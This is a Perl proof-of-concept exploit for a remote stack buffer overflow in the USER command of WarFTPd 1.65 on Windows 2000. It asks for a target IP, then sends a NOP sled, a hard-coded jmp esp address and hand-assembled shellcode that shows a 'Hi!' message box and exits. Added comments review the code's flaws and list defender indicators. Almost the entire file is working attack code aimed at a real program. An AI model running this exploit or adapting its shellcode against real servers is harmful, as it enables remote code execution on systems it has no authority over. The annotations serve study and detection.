use IO::Socket;
# Historical proof-of-concept (per the banner printed below): a stack buffer
# overflow in the FTP USER command of WarFTPd 1.65 on Windows 2000.  The
# script sends one oversized USER line -- a NOP sled, a hard-coded return
# address and a short payload -- over a single TCP connection to port 21.
#
# Review notes (code, not behaviour):
#  - no `use strict; use warnings;` -- every variable here is an unchecked
#    package global;
#  - CLIENT is a bareword filehandle and the socket()/send()/close() results
#    are never checked; a failed connect() is silent (there is no else branch);
#  - $ip is read from STDIN without validation; inet_aton() returns undef for
#    an unresolvable input and sockaddr_in() would then be handed undef.
#
# Defender's view: everything after "user " travels as one FTP argument of
# roughly 550 bytes (485 x 0x90, a 4-byte address, 5 NOPs and a payload of
# under 60 bytes); an over-long USER argument is the on-the-wire / log
# indicator for this class of overflow.  The fixed Kernel32/MSVCRT addresses
# below tie the PoC to one exact OS build -- the property that ASLR/DEP-era
# systems remove, which is why fixed-address payloads like this are fragile.
$port=21;   # FTP control port
$|=1;       # autoflush STDOUT so the prompt below appears before <STDIN> blocks

# Hard-coded addresses the payload relies on (Windows 2000 builds of these DLLs):
	 	 	   	#Kernel32  jmp esp		7754a3ab
				#Kernel32  MessageBoxA	77e375d5
				#MSVCRT	   c_exit		78003985
				

print "\tRemote Buffer overflow of user in WarFTPd 1.65 for Win2k\n\n\tBy kago\@kago.ca\n\n";
print "\tEnter The Target IP :";

$ip = <STDIN>;   # NOTE(review): not validated -- whatever is typed goes straight to inet_aton()
chomp $ip;



	$host = inet_aton($ip);                                        # packed IPv4 address, or undef if $ip does not resolve
            $ServerAddr = sockaddr_in($port, $host);
    		$protocol_name = "tcp";                                # assigned but never used -- socket() below calls getprotobyname('tcp') directly
            socket(CLIENT, PF_INET, SOCK_STREAM, getprotobyname('tcp'));   # bareword handle; return value unchecked
            select(CLIENT); $|=1; select(STDOUT);                  # enable autoflush on CLIENT, then restore STDOUT as the default handle
    		if(connect(CLIENT, $ServerAddr)) {                     # no else branch: a refused or failed connection exits silently
				send(CLIENT,"user ",0);                            # FTP USER command; every send() below is part of its (oversized) argument
				
				send(CLIENT,"\x90"x485,0);	  	 	   #485 nops to overwrite EIP
				send(CLIENT,"\xab\xa3\x54\x77",0);	   #Overwriting EIP with "jmp,esp" address via Kernel32.dll
				send(CLIENT,"\x90"x5,0); 			   #some NOPs for padding- the "call,esp" steps to the last nop at 0098fd9c
				
				send(CLIENT,"\x55",0);						#push ebp - starting something new
				send(CLIENT,"\x8b\xec",0);					#mov ebp,esp
				send(CLIENT,"\x33\xff",0);					#xor edi,edi - edi = 0
				send(CLIENT,"\x57",0);						#push edi 
								
				send(CLIENT,"\xc6\x45\xfc\x48",0);			#mov byte ptr [ebp-0x4],0x48 - H  (original comment said 0x6f; the byte sent is 0x48)
				send(CLIENT,"\xc6\x45\xfd\x69",0);			#mov byte ptr [ebp-0x3],0x69 - i  (original comment said 0x78; the byte sent is 0x69)
				send(CLIENT,"\xc6\x45\xfe\x21",0);			#mov byte ptr [ebp-0x2],0x21 - !
				
				
				send(CLIENT,"\xba\xd5\x75\xe3\x77",0);		#mov edx, 0x77e375d5 - MessageBoxA to edx
				send(CLIENT,"\x52",0);						#push edx
				send(CLIENT,"\x57",0);						#push edi
				send(CLIENT,"\x8d\x55\xfc",0);				#lea edx,[ebp-0x4] - move Hi! to edx
				send(CLIENT,"\x52",0);						#push edx
				send(CLIENT,"\x52",0);						#push edx
				send(CLIENT,"\x52",0);						#push edx
			
				send(CLIENT,"\x57",0);						#push edi
				send(CLIENT,"\xff\x55\xf8",0);				#call dword ptr [ebp-0x8]
				send(CLIENT,"\x55",0);						#push ebp - Start the exit stuff so we don't crash
				send(CLIENT,"\x8b\xec",0);					#move ebp,esp
				send(CLIENT,"\xba\x86\x41\x01\x89",0);		#mov edx, 0x89014186 - To exit we need to call exit at 78003985 from MSVCRT but we can't use Nulls
				send(CLIENT,"\x81\xea\x01\x08\x01\x11",0);	#sub edx, 0x11010201 - My leet-o way to get to the address with the null
				send(CLIENT,"\x52",0);						#push edx
				send(CLIENT,"\x33\xc0",0);					#xor eax,eax
				send(CLIENT,"\x50",0);						#push eax
				send(CLIENT,"\xff\x55\xfc",0);				#call dword ptr [ebp-0x4]  - host-side indicator: the server process exits right after a USER command
				
				send(CLIENT,"\n",0);                       # end of the oversized USER line
				
				close(CLIENT);                             # return value not checked
	
	}
